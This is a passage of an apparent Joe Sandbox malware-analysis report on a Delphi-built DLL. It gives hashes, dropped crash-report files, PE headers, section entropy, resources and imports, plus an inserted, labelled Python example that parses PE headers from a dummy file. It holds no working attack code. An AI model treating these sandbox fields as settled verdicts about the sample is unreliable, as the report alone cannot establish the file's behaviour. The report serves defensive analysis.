                        SHA-512:3B02715FD729AA52FA2738D709F4B09EA244329D1CD8A1FAED420EE2A0A87085BE984ABD38EC3BDF61C2A0D0A5DFCA9640331E596FE7971D8009FF0C5E986BD9
                        Malicious:false
                        Reputation:low
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.7.2.<./.P.i.d.>.......
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4670
                        Entropy (8bit):4.493943117199789
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zs8JgtWI9A2VWSC8BVs8fm8M4JCdszZFAV+q8/OD0yx4SrS1d:uITf632kSNXRJRUVt0iDW1d
                        MD5:0126F95A901429A83B8D25CA87CD378F
                        SHA1:B291C283CF80A9811F1EA5703267243116199DDD
                        SHA-256:507F8842DAC1704D0AF596840F0F75862C0CEC375118DCBDC55ED85F1D39E175
                        SHA-512:6D3D54EE263306831C43EB89F8246689251F0E293ABB94C3E5F63E658D95274E665B774CEB35CD1BB8A8E74F10FE749C0B5315E26085DC76BFC232DBED680EEC
                        Malicious:false
                        Reputation:low
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1359974" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1572864
                        Entropy (8bit):4.2638646695109035
                        Encrypted:false
                        SSDEEP:12288:MLR2cbZ/FPLJ86W9cwmTJw4qNsIbc65wppMcGFtz3OUkB8lA6LD6y7Rt:sR2cbZ/FPLJ86W9yqYKt
                        MD5:35049590C5CC406E8B91A1B0B5092584
                        SHA1:B8ACCA4CFDD281BC793D177261B5A769CAE049C3
                        SHA-256:B84991E6386C563D75788B986DA5381F88A5EA41408DD98DA31B8E2C4755528A
                        SHA-512:26800F9733BF8608CB4BF2C24592BDA4092458DC12E2B707C5503956015600540CF36114916E5696D997FDB72896332A3014664287BC26840D9D79B40F9CC19A
                        Malicious:false
                        Reputation:low
                        Preview:regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................e..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):24576
                        Entropy (8bit):3.8361821028758083
                        Encrypted:false
                        SSDEEP:384:Zwb5uZrdgdXX5gQp8XXLnxOf2oMPmxwp95GjZmGuADTTeW5N5oAR1V:mlcreXXZpigf2ovxwp3WmGuuTeSN51R1
                        MD5:498211172CBFC34A13FD2E9630E30A11
                        SHA1:7413547E9D96756DF22533A3E31E05F5996C75CC
                        SHA-256:6B575ABA2719D1440DCAFECBA4C5FBA11673407180D636A18D597189984D0B21
                        SHA-512:2E58314560305ECCCEFA4377EA207FC5B825E2B55E4F2AA1314355E89E44C2D2AFF62D830A82B8D3731E3650AC473C79E19A5A79C0F6DB0D71132481E69CAC90
                        Malicious:false
                        Reputation:low
                        Preview:regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................e..HvLE.^......P...............}JB...l..+|.............................. ..hbin................p.\..,..........nk,..(..........X........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..(.......... ...........P............... .......Z.......................Root........lf......Root....nk ..(.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.882756524717819
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 97.97%
                        • Win32 Executable Delphi generic (14689/80) 1.44%
                        • Win16/32 Executable Delphi generic (2074/23) 0.20%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        File name:hFGZpat9Mf.dll
                        File size:655360
                        MD5:9acde2c3e3a375590a1bc716eabc52c5
                        SHA1:e231c9ae802a9aad9916f08256f7558f531d54ce
                        SHA256:57f997217db22a4d97700768189d44034303e3b15dc08fa48ed6b91bd7051c05
                        SHA512:3c282a6dac4c1a655a6851ef7bcf9d336603614216f93e8bde031697118439081b113bb71473e2939b30225fa684d56d9dbc80bd888cc3312b167c7bef130946
                        SSDEEP:12288:CxdKNJ2yElIM31TVlVPt0+JQjahIx9Q2oleUcUGHS:CwuyElIMlTzBt0Bp3seBU
                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                        Icon Hash:b99988fcd4f66e0f
                        Entrypoint:0x46b448
                        Entrypoint Section:CODE
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                        DLL Characteristics:
                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:7f3476b35f56feee8663a4d549e47d9e
                        Instruction
                        push ebp
                        mov ebp, esp
                        add esp, FFFFFFC4h
                        push ebx
                        mov eax, 0046B028h
                        call 00007F8E18CB1738h
                        push 0046BDF8h
                        call 00007F8E18CB1A8Ah
                        push 0046BDF8h
                        call 00007F8E18CB1A80h
                        push 0046BDF8h
                        call 00007F8E18CB1A76h
                        push 0046BDF8h
                        call 00007F8E18CB1A6Ch
                        push 0046BDF8h
                        call 00007F8E18CB1A62h
                        push 0046BDF8h
                        call 00007F8E18CB1A58h
                        push 0046BDF8h
                        call 00007F8E18CB1A4Eh
                        push 0046BDF8h
                        call 00007F8E18CB1A44h
                        push 0046BDF8h
                        call 00007F8E18CB1A3Ah
                        push 0046BDF8h
                        call 00007F8E18CB1A30h
                        push 0046BDF8h
                        call 00007F8E18CB1A26h
                        push 0046BDF8h
                        call 00007F8E18CB1A1Ch
                        push 0046BDF8h
                        call 00007F8E18CB1A12h
                        push 0046BDF8h
                        call 00007F8E18CB1A08h
                        push 0046BDF8h
                        call 00007F8E18CB19FEh
                        push 0046BDF8h
                        call 00007F8E18CB19F4h
                        push 0046BDF8h
                        call 00007F8E18CB19EAh
                        push 0046BDF8h
                        call 00007F8E18CB19E0h
                        push 0000BDF8h
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x70000          0x2172        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x7a000          0x29600       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x73000          0x6e18        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
CODE    0x1000           0x6ae04       0x6b000   False     0.529191917348   data       6.56713483483  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA    0x6c000          0x2324        0x2400    False     0.465928819444   data       4.93971870671  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS     0x6f000          0xf55         0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata  0x70000          0x2172        0x2200    False     0.365349264706   data       4.98625501899  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0x73000          0x6e18        0x7000    False     0.615618024554   data       6.66070715654  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc   0x7a000          0x29600       0x29600   False     0.458589029456   data       6.73870167703  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
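The header and section tables above are all derived from a handful of PE structures: the COFF file header supplies the Time Stamp and the Image File Characteristics flag set (the flags listed above sum to 0xA18E), and each 40-byte IMAGE_SECTION_HEADER supplies the section name, virtual address/size, raw size and characteristics, with the Entropy column being the 8-bit Shannon entropy of the section's raw bytes. Two details are worth knowing when reading them: the timestamp 0x2A425E19 (19 June 1992) is the fixed constant that Borland/Delphi linkers write instead of a build time, so it says "Delphi-built", not "old", and the CODE/DATA/BSS section names are the Delphi linker's defaults, consistent with the TrID and "MZP" file-preview hits. The Python below, added here as an example and not part of the Joe Sandbox report, decodes those fields from raw bytes. It runs against a constructed stand-in PE32 skeleton built in the block (same Characteristics value, same timestamp constant, same CODE/DATA section flags as the sample, but dummy section bytes), not against hFGZpat9Mf.dll, and the flag tables are the standard winnt.h bit values.

```python
"""Decode the PE header fields the report tabulates for this DLL: COFF
Characteristics, TimeDateStamp, per-section Characteristics and 8-bit entropy.
Added example, not part of the Joe Sandbox report. The mini PE built below is
a constructed stand-in (same header values as the sample, dummy bytes), not
the analysed file."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h)
FILE_FLAGS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE", 0x0080: "BYTES_REVERSED_LO",
    0x0100: "32BIT_MACHINE", 0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL", 0x8000: "BYTES_REVERSED_HI",
}
# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x10000000: "IMAGE_SCN_MEM_SHARED",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
# Borland/Delphi linkers write this constant instead of the build time.
DELPHI_TIMESTAMP = 0x2A425E19


def decode_flags(value, table):
    """Names of the set bits, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def timestamp_utc(ts):
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty/constant input, 8.0 for uniformly random bytes."""
    n = len(data)
    if n == 0:
        return 0.0
    h = -sum(c / n * math.log2(c / n) for c in Counter(data).values())
    return h if h else 0.0  # avoid returning -0.0 for a constant block


def parse_pe(pe):
    """Walk DOS header -> e_lfanew -> COFF header -> section table of a PE32 image."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    sec_off = e_lfanew + 24 + opt_size
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr, _, _, _, _, sflags = struct.unpack_from(
            "<8sIIIIIIHHI", pe, sec_off + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": rsize,
            "entropy": round(shannon_entropy(pe[rptr:rptr + rsize]), 3),
            "characteristics": decode_flags(sflags, SECTION_FLAGS),
        })
    return {
        "machine": machine,
        "timestamp": timestamp_utc(ts).isoformat(),
        "delphi_constant_timestamp": ts == DELPHI_TIMESTAMP,
        "characteristics": decode_flags(chars, FILE_FLAGS),
        "sections": sections,
    }


def build_minimal_pe(sections, timestamp=DELPHI_TIMESTAMP, characteristics=0xA18E):
    """Constructed PE32 skeleton (not the sample): DOS stub, COFF header, zeroed
    optional header and (name, flags, raw bytes) sections on 0x200 file alignment."""
    e_lfanew, opt_size = 0x40, 224
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, characteristics)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    raw_ptr = (e_lfanew + 24 + opt_size + 40 * len(sections) + 0x1FF) & ~0x1FF
    table, blobs, va = b"", b"", 0x1000
    for name, flags, data in sections:
        padded = data + b"\0" * (-len(data) % 0x200)
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), va, len(padded),
                             raw_ptr, 0, 0, 0, 0, flags)
        blobs += padded
        raw_ptr += len(padded)
        va += (len(padded) + 0xFFF) & ~0xFFF
    headers = dos + b"PE\0\0" + coff + opt + table
    return headers.ljust(len(headers) + (-len(headers) % 0x200), b"\0") + blobs


if __name__ == "__main__":
    demo = build_minimal_pe([("CODE", 0x60000020, bytes(range(256)) * 4),
                             ("DATA", 0xC0000040, b"A" * 512)])
    info = parse_pe(demo)
    print(info["timestamp"], "delphi constant:", info["delphi_constant_timestamp"])
    print(", ".join(info["characteristics"]))
    for s in info["sections"]:
        print(f"{s['name']:8} VA=0x{s['virtual_address']:x} entropy={s['entropy']} {s['characteristics']}")
```

Pointing parse_pe at the real sample bytes instead of the constructed skeleton would reproduce the section rows above; the entropy values in the 6.5 to 6.7 range for CODE, .reloc and .rsrc are well below the 7.9+ typical of a packed or encrypted section, which is consistent with the report finding plain string-decryption routines rather than a packer.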
Name       RVA      Size    Type                                                                                                      Language   Country
RT_CURSOR  0x7bd68  0x134   data
RT_CURSOR  0x7be9c  0x134   data
RT_CURSOR  0x7bfd0  0x134   data
RT_CURSOR  0x7c104  0x134   data
RT_CURSOR  0x7c238  0x134   data
RT_CURSOR  0x7c36c  0x134   data
RT_CURSOR  0x7c4a0  0x134   data
RT_BITMAP  0x7c5d4  0x1d0   data
RT_BITMAP  0x7c7a4  0x1e4   data
RT_BITMAP  0x7c988  0x1d0   data
RT_BITMAP  0x7cb58  0x1d0   data
RT_BITMAP  0x7cd28  0x1d0   data
RT_BITMAP  0x7cef8  0x1d0   data
RT_BITMAP  0x7d0c8  0x1d0   data
RT_BITMAP  0x7d298  0x1d0   data
RT_BITMAP  0x7d468  0x1d0   data
RT_BITMAP  0x7d638  0x1d0   data
RT_BITMAP  0x7d808  0xe8    GLS_BINARY_LSB_FIRST
RT_ICON    0x7d8f0  0x2e8   dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 49, next used block 48059  English    United States
RT_DIALOG  0x7dbd8  0x52    data
RT_STRING  0x7dc2c  0x15c   data
RT_STRING  0x7dd88  0x3e4   data
RT_STRING  0x7e16c  0x340   data
RT_STRING  0x7e4ac  0x354   data
RT_STRING  0x7e800  0x230   data
RT_STRING  0x7ea30  0x1d4   data
RT_STRING  0x7ec04  0xec    data
RT_STRING  0x7ecf0  0x2fc   data
RT_STRING  0x7efec  0xd4    data
RT_STRING  0x7f0c0  0x110   data
RT_STRING  0x7f1d0  0x24c   data
RT_STRING  0x7f41c  0x3f8   data
RT_STRING  0x7f814  0x360   data
RT_STRING  0x7fb74  0x3e8   data
RT_STRING  0x7ff5c  0x234   data
RT_STRING  0x80190  0xec    data
RT_STRING  0x8027c  0x1b4   data
RT_STRING  0x80430  0x3e4   data
RT_STRING  0x80814  0x358   data
RT_STRING  0x80b6c  0x2b4   data
RT_RCDATA  0x80e20  0x10    data
RT_RCDATA  0x80e30  0x2fe   MS Windows icon resource - 1 icon, 32x32, 16 colors                                                        Bulgarian  Bulgaria
RT_RCDATA  0x81130  0x104   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81234  0x10b   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81340  0xed    GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81430  0xe4    GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81514  0xfe    GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81614  0x96    GIF image data, version 89a, 24 x 24                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x816ac  0x10c   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x817b8  0x105   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x818c0  0x102   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x819c4  0xfb    GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81ac0  0x10e   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81bd0  0x105   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81cd8  0x100   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81dd8  0xfc    GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81ed4  0x113   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x81fe8  0x10e   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x820f8  0x106   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82200  0xfd    GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82300  0x115   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82418  0x113   GIF image data, version 89a, 22 x 22                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x8252c  0x229   HTML document, ASCII text, with CRLF, CR line terminators                                                 Bulgarian  Bulgaria
RT_RCDATA  0x82758  0x3f    GIF image data, version 89a, 12 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82798  0x6e    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82808  0x50    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82858  0x6c    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x828c4  0x4f    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82914  0x6f    GIF image data, version 89a, 17 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82984  0x41    GIF image data, version 89a, 15 x 15                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x829c8  0x3c    GIF image data, version 89a, 16 x 12                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82a04  0x69    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82a70  0x4d    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82ac0  0x71    GIF image data, version 89a, 16 x 17                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82b34  0x69    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82ba0  0x4d    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82bf0  0x12c   GIF image data, version 89a, 10 x 12                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82d1c  0x129   GIF image data, version 89a, 10 x 12                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82e48  0x91    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82edc  0x82    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82f60  0x75    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x82fd8  0x9e    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x83078  0x7c    GIF image data, version 89a, 16 x 16                                                                      Bulgarian  Bulgaria
RT_RCDATA  0x830f4  0x36    GIF image data, version 89a, 1 x 1                                                                        Bulgarian  Bulgaria
RT_RCDATA  0x8312c  0xea6   HTML document, ASCII text, with CRLF line terminators                                                     Bulgarian  Bulgaria
RT_RCDATA  0x83fd4  0x2b9f  ASCII text, with CRLF line terminators                                                                    Bulgarian  Bulgaria
RT_RCDATA  0x86b74  0x4e98  ASCII text, with CRLF line terminators                                                                    Bulgarian  Bulgaria
RT_RCDATA  0x8ba0c  0x539   ASCII text, with CRLF line terminators                                                                    Bulgarian  Bulgaria
RT_RCDATA  0x8bf48  0x1d08  HTML document, ASCII text, with CRLF line terminators                                                     Bulgarian  Bulgaria
RT_RCDATA  0x8dc50  0x61b   ASCII text, with CRLF line terminators                                                                    Bulgarian  Bulgaria
RT_RCDATA  0x8e26c  0x671   ASCII text, with CRLF line terminators                                                                    Bulgarian  Bulgaria
                        RT_RCDATA0x8e8e00x7e61ASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x967440xd59HTML document, ASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x974a00x664data
                        RT_RCDATA0x97b040x1c9Delphi compiled form 'Tgj3eo9f8hwe89fq'
                        RT_RCDATA0x97cd00xb804dataEnglishUnited States
                        RT_GROUP_CURSOR0xa34d40x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa34e80x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa34fc0x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa35100x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa35240x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa35380x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa354c0x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_ICON0xa35600x14dataEnglishUnited States
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StrokePath, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
